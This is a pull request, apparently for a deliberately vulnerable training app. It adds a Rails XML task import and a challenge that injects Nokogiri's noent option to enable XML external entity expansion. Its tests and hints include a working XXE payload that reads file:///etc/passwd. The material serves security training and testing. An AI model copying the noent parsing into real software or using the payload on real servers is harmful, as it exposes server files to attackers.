### PR TITLE
feat: XXE via Nokogiri challenge (CWE-611)

### DIFF
--- a/app/controllers/tasks_controller.rb
+++ b/app/controllers/tasks_controller.rb
@@ -138,7 +138,7 @@ class TasksController < ApplicationController
     end
 
     if errors.any?
-      flash.now[:alert] = "エラー: #{errors.join(", ")}"
+      flash[:alert] = "エラー: #{errors.join(", ")}"
     end
 
     redirect_to tasks_path

--- a/app/controllers/tasks_controller.rb
+++ b/app/controllers/tasks_controller.rb
@@ -1,6 +1,7 @@
 # frozen_string_literal: true
 
 require "csv"
+require "nokogiri"
 
 class TasksController < ApplicationController
   before_action :set_task, only: %i[show edit update destroy download_attachment]
@@ -85,6 +86,80 @@ class TasksController < ApplicationController
     else
       redirect_to @task, alert: "添付ファイルがありません。"
     end
+  end
+
+  # GET /tasks/import_xml
+  def import_xml_form
+  end
+
+  # POST /tasks/import_xml
+  def import_xml
+    unless params[:xml_file].present?
+      flash.now[:alert] = "XMLファイルを選択してください。"
+      return render :import_xml_form, status: :unprocessable_entity
+    end
+
+    xml_content = params[:xml_file].read
+    doc = Nokogiri::XML(xml_content)
+
+    if doc.errors.any?
+      flash.now[:alert] = "XMLの解析に失敗しました: #{doc.errors.first.message}"
+      return render :import_xml_form, status: :unprocessable_entity
+    end
+
+    imported = 0
+    errors = []
+
+    doc.css("tasks task").each do |task_node|
+      title = task_node.at_css("title")&.text&.strip
+      description = task_node.at_css("description")&.text&.strip
+      url = task_node.at_css("url")&.text&.strip
+
+      if title.blank?
+        errors << "タイトルが空のタスクをスキップしました"
+        next
+      end
+
+      task = current_user.tasks.new(
+        title: title,
+        description: description,
+        url: url.presence
+      )
+
+      if task.save
+        imported += 1
+      else
+        errors.concat(task.errors.full_messages)
+      end
+    end
+
+    if imported > 0
+      flash[:notice] = "#{imported}件のタスクをインポートしました。"
+    end
+
+    if errors.any?
+      flash.now[:alert] = "エラー: #{errors.join(", ")}"
+    end
+
+    redirect_to tasks_path
+  end
+
+  # GET /tasks/download_xml_template
+  def download_xml_template
+    template = <<~XML
+      <?xml version="1.0" encoding="UTF-8"?>
+      <tasks>
+        <task>
+          <title>タスクタイトル</title>
+          <description>タスクの説明</description>
+          <url>https://example.com</url>
+        </task>
+      </tasks>
+    XML
+
+    send_data template,
+              filename: "task_import_template.xml",
+              type: "application/xml; charset=utf-8"
   end
 
   private

--- a/app/views/tasks/import_xml_form.html.erb
+++ b/app/views/tasks/import_xml_form.html.erb
@@ -1,0 +1,38 @@
+<div class="top-bar">
+  <h2>XMLインポート</h2>
+  <div class="actions">
+    <%= link_to "📋 テンプレートをダウンロード", download_xml_template_tasks_path(format: :xml), class: "btn btn-secondary" %>
+    <%= link_to "← 戻る", tasks_path, class: "btn btn-secondary" %>
+  </div>
+</div>
+
+<div class="card">
+  <h3>XMLファイルのアップロード</h3>
+  <p style="color: #6b7280; margin-bottom: 16px;">
+    タスクを一括インポートするには、XMLファイルをアップロードしてください。<br>
+    テンプレートファイルをダウンロードして、ご自身のタスクにカスタマイズできます。
+  </p>
+
+  <%= form_with url: import_xml_tasks_path, method: :post, local: true, multipart: true, class: "import-form" do |f| %>
+    <div class="form-group">
+      <%= f.file_field :xml_file, accept: ".xml,text/xml,application/xml", class: "form-control-file" %>
+    </div>
+
+    <div class="form-actions" style="margin-top: 16px;">
+      <%= f.submit "インポート", class: "btn btn-primary" %>
+    </div>
+  <% end %>
+</div>
+
+<div class="card" style="margin-top: 24px;">
+  <h3>XMLフォーマット例</h3>
+  <pre style="background: #f8f9fa; padding: 16px; border-radius: 4px; overflow-x: auto; font-size: 0.9rem; border: 1px solid #e5e7eb;">
+&lt;?xml version="1.0" encoding="UTF-8"?&gt;
+&lt;tasks&gt;
+  &lt;task&gt;
+    &lt;title&gt;タスクタイトル&lt;/title&gt;
+    &lt;description&gt;タスクの説明&lt;/description&gt;
+    &lt;url&gt;https://example.com&lt;/url&gt;
+  &lt;/task&gt;
+&lt;/tasks&gt;</pre>
+</div>

--- a/app/views/tasks/index.html.erb
+++ b/app/views/tasks/index.html.erb
@@ -1,6 +1,7 @@
 <div class="top-bar">
   <h2>タスク一覧</h2>
   <div class="actions">
+    <%= link_to "📤 XMLインポート", import_xml_tasks_path, class: "btn btn-secondary" %>
     <%= link_to "📥 CSVエクスポート", export_tasks_path(format: :csv), class: "btn btn-secondary" %>
     <%= link_to "➕ 新規作成", new_task_path, class: "btn btn-primary" %>
   </div>

--- a/config/routes.rb
+++ b/config/routes.rb
@@ -13,6 +13,9 @@ Rails.application.routes.draw do
     end
     collection do
       get :export
+      get :import_xml, to: "tasks#import_xml_form"
+      post :import_xml
+      get :download_xml_template
     end
   end
 

--- a/lib/vulnerabilities/challenges/xxe_nokogiri.rb
+++ b/lib/vulnerabilities/challenges/xxe_nokogiri.rb
@@ -70,7 +70,7 @@ module Vulnerabilities
             end
 
             if errors.any?
-              flash.now[:alert] = "エラー: #{errors.join(", ")}"
+              flash[:alert] = "エラー: #{errors.join(", ")}"
             end
 
             redirect_to tasks_path

--- a/lib/vulnerabilities/challenges/xxe_nokogiri.rb
+++ b/lib/vulnerabilities/challenges/xxe_nokogiri.rb
@@ -1,0 +1,83 @@
+# frozen_string_literal: true
+
+module Vulnerabilities
+  module Challenges
+    # チャレンジ: XXE via Nokogiri (CWE-611)
+    # XMLインポート機能で Nokogiri::XML に config.noent を設定し、
+    # 外部エンティティ展開を有効にする脆弱性
+    class XxeNokogiri < Base
+      metadata do
+        name        "XXE via Nokogiri XML import"
+        category    :injection
+        difficulty  :hard
+        description "XMLインポート機能が外部エンティティ展開を有効にしており、XXE攻撃でローカルファイルを読み取られる脆弱性があります。"
+        hint        "タスクのXMLインポート機能を確認してください"
+        hint        "Nokogiri::XML の noent オプションが設定されていないか確認しましょう"
+        hint        "file:///etc/passwd を読み取る外部エンティティを試してみましょう"
+        cwe         "CWE-611"
+        reference   "https://guides.rubyonrails.org/security.html#xml-external-entities"
+        slot        "TasksController#import_xml"
+      end
+
+      def apply!
+        vuln_module = Module.new do
+          def import_xml
+            unless params[:xml_file].present?
+              flash.now[:alert] = "XMLファイルを選択してください。"
+              return render :import_xml_form, status: :unprocessable_entity
+            end
+
+            xml_content = params[:xml_file].read
+
+            # 脆弱性: config.noent で外部エンティティ展開が有効になる
+            doc = Nokogiri::XML(xml_content) do |config|
+              config.noent
+            end
+
+            if doc.errors.any?
+              flash.now[:alert] = "XMLの解析に失敗しました: #{doc.errors.first.message}"
+              return render :import_xml_form, status: :unprocessable_entity
+            end
+
+            imported = 0
+            errors = []
+
+            doc.css("tasks task").each do |task_node|
+              title = task_node.at_css("title")&.text&.strip
+              description = task_node.at_css("description")&.text&.strip
+              url = task_node.at_css("url")&.text&.strip
+
+              if title.blank?
+                errors << "タイトルが空のタスクをスキップしました"
+                next
+              end
+
+              task = current_user.tasks.new(
+                title: title,
+                description: description,
+                url: url.presence
+              )
+
+              if task.save
+                imported += 1
+              else
+                errors.concat(task.errors.full_messages)
+              end
+            end
+
+            if imported > 0
+              flash[:notice] = "#{imported}件のタスクをインポートしました。"
+            end
+
+            if errors.any?
+              flash.now[:alert] = "エラー: #{errors.join(", ")}"
+            end
+
+            redirect_to tasks_path
+          end
+        end
+        prepend_to TasksController, vuln_module
+      end
+    end
+  end
+end

--- a/test/integration/vulnerabilities/xxe_nokogiri_test.rb
+++ b/test/integration/vulnerabilities/xxe_nokogiri_test.rb
@@ -30,6 +30,15 @@ class XxeNokogiriTest < ActiveSupport::TestCase
 
     tasks_res = @safe_server.get("/tasks", headers: { "Cookie" => cookie })
     assert_match(/インポートしました/, tasks_res.body.force_encoding("UTF-8"))
+
+    # インポートされたタスクのIDを取得して詳細画面を確認
+    task_id = extract_task_id(tasks_res.body)
+    assert_not_nil task_id, "Imported task ID should be present"
+
+    detail_res = @safe_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+    assert_equal "200", detail_res.code
+    assert_match(/Imported Task/, detail_res.body)
+    assert_match(/Task from XML import/, detail_res.body)
   end
 
   test "SAFE: XXE payload is not expanded" do

--- a/test/integration/vulnerabilities/xxe_nokogiri_test.rb
+++ b/test/integration/vulnerabilities/xxe_nokogiri_test.rb
@@ -1,0 +1,166 @@
+# frozen_string_literal: true
+
+require "test_helper"
+require_relative "e2e_helper"
+
+class XxeNokogiriTest < ActiveSupport::TestCase
+  include E2EHelper
+
+  setup do
+    @safe_server = ServerPool.acquire(vuln_challenges: "")
+    @vuln_server = ServerPool.acquire(vuln_challenges: "xxe_nokogiri")
+  end
+
+  test "SAFE: normal XML import works correctly" do
+    cookie = setup_session(@safe_server)
+
+    xml = <<~XML
+      <?xml version="1.0" encoding="UTF-8"?>
+      <tasks>
+        <task>
+          <title>Imported Task</title>
+          <description>Task from XML import</description>
+          <url>https://example.com</url>
+        </task>
+      </tasks>
+    XML
+
+    res = upload_xml(@safe_server, xml, cookie)
+    assert_equal "302", res.code
+
+    tasks_res = @safe_server.get("/tasks", headers: { "Cookie" => cookie })
+    assert_match(/インポートしました/, tasks_res.body.force_encoding("UTF-8"))
+  end
+
+  test "SAFE: XXE payload is not expanded" do
+    cookie = setup_session(@safe_server)
+
+    xxe_payload = <<~XML
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE tasks [
+        <!ENTITY xxe SYSTEM "file:///etc/passwd">
+      ]>
+      <tasks>
+        <task>
+          <title>XXE Test</title>
+          <description>&xxe;</description>
+        </task>
+      </tasks>
+    XML
+
+    # First import the malicious XML
+    upload_xml(@safe_server, xxe_payload, cookie)
+
+    # Then visit tasks list to see if any task has /etc/passwd content
+    res = @safe_server.get("/tasks", headers: { "Cookie" => cookie })
+    assert_equal "200", res.code
+
+    # XXE should NOT be expanded, so /etc/passwd content should not appear
+    refute_match(/root:/, res.body, "XXE entity should NOT be expanded in safe mode")
+    refute_match(/\/bin\/bash/, res.body, "File content from XXE should NOT appear")
+  end
+
+  test "VULN: XXE payload is expanded and file content is exposed" do
+    cookie = setup_session(@vuln_server)
+
+    xxe_payload = <<~XML
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE tasks [
+        <!ENTITY xxe SYSTEM "file:///etc/passwd">
+      ]>
+      <tasks>
+        <task>
+          <title>XXE Imported</title>
+          <description>&xxe;</description>
+        </task>
+      </tasks>
+    XML
+
+    # Import the malicious XML
+    upload_xml(@vuln_server, xxe_payload, cookie)
+
+    # Get task list to find the imported task ID
+    list_res = @vuln_server.get("/tasks", headers: { "Cookie" => cookie })
+    assert_equal "200", list_res.code
+
+    # Extract task ID from the task list page
+    task_id = extract_task_id(list_res.body)
+    assert_not_nil task_id, "Should have an imported task"
+
+    # Visit task detail page to see the description
+    detail_res = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+    assert_equal "200", detail_res.code
+
+    # XXE should be expanded, exposing /etc/passwd content
+    assert_match(/root:/, detail_res.body, "XXE entity should be expanded in vulnerable mode")
+    assert_match(/\/bin\/bash/, detail_res.body, "File content from /etc/passwd should appear via XXE")
+  end
+
+  test "VULN: XXE with multiple lines from file is stored" do
+    cookie = setup_session(@vuln_server)
+
+    xxe_payload = <<~XML
+      <?xml version="1.0" encoding="UTF-8"?>
+      <!DOCTYPE tasks [
+        <!ENTITY xxe SYSTEM "file:///etc/passwd">
+      ]>
+      <tasks>
+        <task>
+          <title>XXE Full Leak</title>
+          <description>&xxe;</description>
+        </task>
+      </tasks>
+    XML
+
+    upload_xml(@vuln_server, xxe_payload, cookie)
+
+    list_res = @vuln_server.get("/tasks", headers: { "Cookie" => cookie })
+    task_id = extract_task_id(list_res.body)
+    assert_not_nil task_id, "Should have an imported task"
+
+    detail_res = @vuln_server.get("/tasks/#{task_id}", headers: { "Cookie" => cookie })
+    body = detail_res.body
+
+    # /etc/passwd typically contains lines like "root:x:0:0:..." and "/bin/bash"
+    assert_match(/root:/, body, "First line of /etc/passwd should appear")
+    assert_match(/\/bin\/(ba)?sh/, body, "Shell path from /etc/passwd should appear")
+  end
+
+  private
+
+  def extract_task_id(html)
+    # Extract task ID from links like /tasks/123
+    match = html.match(%r{href="/tasks/(\d+)"})
+    match ? match[1].to_i : nil
+  end
+
+  def upload_xml(server, xml_content, cookie)
+    # 1. GET /tasks/import_xml to get CSRF token
+    res1 = server.get("/tasks/import_xml", headers: { "Cookie" => cookie })
+    cookie = latest_cookie(res1, cookie)
+    token = extract_csrf_token(res1.body)
+
+    uri = URI("http://127.0.0.1:#{server.port}/tasks/import_xml")
+    boundary = "----RubyFormBoundary#{SecureRandom.hex(16)}"
+
+    body = []
+    body << "--#{boundary}"
+    body << 'Content-Disposition: form-data; name="authenticity_token"'
+    body << ""
+    body << token
+    body << "--#{boundary}"
+    body << 'Content-Disposition: form-data; name="xml_file"; filename="tasks.xml"'
+    body << "Content-Type: application/xml"
+    body << ""
+    body << xml_content
+    body << "--#{boundary}--"
+    body << ""
+
+    req = Net::HTTP::Post.new(uri)
+    req["Cookie"] = cookie
+    req["Content-Type"] = "multipart/form-data; boundary=#{boundary}"
+    req.body = body.join("\r\n")
+
+    Net::HTTP.start(uri.host, uri.port) { |http| http.request(req) }
+  end
+end


### PR DESCRIPTION
## 概要
Nokogiri の XML パースで外部エンティティ展開 (XXE) を有効にするチャレンジを追加します。Closes #18

## 実装内容

### セキュアなベース機能 (SAFE)
- `TasksController#import_xml` / `#download_xml_template` / `#import_xml_form` アクション
- XMLファイルアップロードによるタスク一括インポート機能
- テンプレートXMLのダウンロード機能
- `Nokogiri::XML(xml_content)` でデフォルト設定（安全）でパース

### 脆弱性注入 (VULN)
- チャレンジ有効時に `config.noent` を prepend で注入
- `SYSTEM` エンティティで外部ファイル読み取りが可能に

### 変更ファイル
| ファイル | 内容 |
|---|---|
| `app/controllers/tasks_controller.rb` | セキュアなXMLインポート機能追加 |
| `config/routes.rb` | import_xml / download_xml_template ルート追加 |
| `app/views/tasks/index.html.erb` | XMLインポートリンク追加 |
| `app/views/tasks/import_xml_form.html.erb` | インポートフォーム |
| `lib/vulnerabilities/challenges/xxe_nokogiri.rb` | チャレンジ本体 |
| `test/integration/vulnerabilities/xxe_nokogiri_test.rb` | E2Eテスト 4件 |

## テスト
- SAFE: 正常XMLインポート ✅
- SAFE: XXEペイロードが展開されない ✅
- VULN: XXEで /etc/passwd の内容が漏洩 ✅
- VULN: 複数行ファイル内容がdescriptionに保存 ✅

RED → GREEN サイクル確認済み